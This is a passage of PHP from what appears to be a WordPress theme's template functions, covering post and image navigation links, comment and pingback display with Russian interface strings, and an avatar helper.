				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			if (function_exists('wp_pagenavi')) { // http://wordpress.org/extend/plugins/wp-pagenavi/
				ob_start();
				wp_pagenavi();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			//posts
			$prev_link = get_previous_posts_link(__('Newer posts <span class="meta-nav">&rarr;</span>', THEME_NS));
			$next_link = get_next_posts_link(__('<span class="meta-nav">&larr;</span> Older posts', THEME_NS));
		}
		$content = '';
		if ($prev_link || $next_link) {

			$content = <<<EOL
	<div class="navigation">
		<div class="alignleft">{$next_link}</div>
		<div class="alignright">{$prev_link}</div>
	 </div>
EOL;
		}
		if ($wrap) {
			theme_post_wrapper(array('content' => $content));	
		} else {
			echo $content;
		}
	}
}

if (!function_exists('theme_get_previous_post_link')){

	function theme_get_previous_post_link($format='&laquo; %link', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, true);
	}
}

if (!function_exists('theme_get_next_post_link')){
	function theme_get_next_post_link($format='%link &raquo;', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, false);
	}
}

if (!function_exists('theme_get_adjacent_image_link')){
	function theme_get_adjacent_image_link($prev = true, $size = 'thumbnail', $text = false) {
		global $post;
		$post = get_post($post);
		$attachments = array_values(get_children( array('post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID') ));

		foreach ( $attachments as $k => $attachment )
			if ( $attachment->ID == $post->ID )
				break;

		$k = $prev ? $k - 1 : $k + 1;

		if ( isset($attachments[$k]) )
			return wp_get_attachment_link($attachments[$k]->ID, $size, true, false, $text);
	}
}

if (!function_exists('theme_get_previous_image_link')){
	function theme_get_previous_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(true, $size, $text);
		if ($result) $result = '&laquo; ' . $result;
		return $result;
	}
}
	
if (!function_exists('theme_get_next_image_link')){
	function theme_get_next_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(false, $size, $text);
		if ($result) $result .= ' &raquo;';
		return $result;
	}
}

if (!function_exists('theme_get_adjacent_post_link')){
	function theme_get_adjacent_post_link($format, $link, $in_same_cat = false, $excluded_categories = '', $previous = true) {
		if ( $previous && is_attachment() )
			$post = & get_post($GLOBALS['post']->post_parent);
		else
			$post = get_adjacent_post($in_same_cat, $excluded_categories, $previous);

		if ( !$post )
			return;

		$title = $post->post_title;

		if ( empty($post->post_title) )
			$title = $previous ? __('Предыдущая запись', THEME_NS) : __('Следующая запись', THEME_NS);

		$title = apply_filters('the_title', $title, $post->ID);
		$short_title = $title;
		if (theme_get_option('theme_single_navigation_trim_title')) {
			$short_title = theme_trim_long_str($title, theme_get_option('theme_single_navigation_trim_len'));
		}
		$date = mysql2date(get_option('date_format'), $post->post_date);
		$rel = $previous ? 'prev' : 'next';

		$string = '<a href="'.get_permalink($post).'" title="'.esc_attr($title).'" rel="'.$rel.'">';
		$link = str_replace('%title', $short_title, $link);
		$link = str_replace('%date', $date, $link);
		$link = $string . $link . '</a>';

		$format = str_replace('%link', $link, $format);

		$adjacent = $previous ? 'previous' : 'next';
		return apply_filters( "{$adjacent}_post_link", $format, $link );
	}
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('theme_comment')){
	function theme_comment( $comment, $args, $depth ) {
		$GLOBALS['comment'] = $comment;
		
		
		switch ( $comment->comment_type ) :
		
			case '' :
		?>
		<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
			<?php ob_start(); ?>
			<div class="comment-author vcard">
				<?php echo theme_get_avatar(array('id' => $comment, 'size' => 48)); ?>
				<?php printf( __( '%s <span class="says">says:</span>', THEME_NS ), sprintf( '<cite class="fn">%s</cite>', get_comment_author_link() ) ); ?>
			</div>
			<?php if ( $comment->comment_approved == '0' ) : ?>
				<em><?php _e( 'Ваш комментарий ожидает модерации.', THEME_NS); ?></em>
				<br />
			<?php endif; ?>

			<div class="comment-meta commentmetadata"><a href="<?php echo esc_url( get_comment_link( $comment->comment_ID ) ); ?>">
				<?php
					printf( __( '%1$s в %2$s', THEME_NS ), get_comment_date(),  get_comment_time() ); ?></a><?php edit_comment_link( __( '(Редактировать)', THEME_NS), ' ' );
				?>
			</div>

			<div class="comment-body"><?php comment_text(); ?></div>

			<div class="reply">
				<?php comment_reply_link( array_merge( $args, array( 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
			</div>
			<?php theme_post_wrapper(array('content' => ob_get_clean(), 'id' => 'comment-'.get_comment_ID())); ?>


		<?php
				break;
			case 'pingback'  :
			case 'trackback' :
		?>
		<li class="post pingback">
		<?php ob_start(); ?>
			<p><?php _e( 'Pingback:', THEME_NS ); ?> <?php comment_author_link(); ?><?php edit_comment_link( __('(Редактировать)', THEME_NS), ' ' ); ?></p>
		<?php theme_post_wrapper(array('content' => ob_get_clean(), 'class' => $comment->comment_type));
				break;
		endswitch;
	}
}

if (!function_exists('theme_get_avatar')){
	function theme_get_avatar($args = ''){
	$args = wp_parse_args($args, array('id' => false, 'size' => 96, 'default' => '', 'alt' => false, 'url' => false));
	extract($args);
		$result = get_avatar($id, $size, $default, $alt);
		if ($result) {
			if ($url){
				$result = '<a href="'.esc_url($url).'">' . $result . '</a>';
			}
			$result = '<div class="avatar">' . $result . '</div>';
		}
		return $result;
	}
}

if (!function_exists('get_post_format')){
	function get_post_format(){
		return false;
	}
}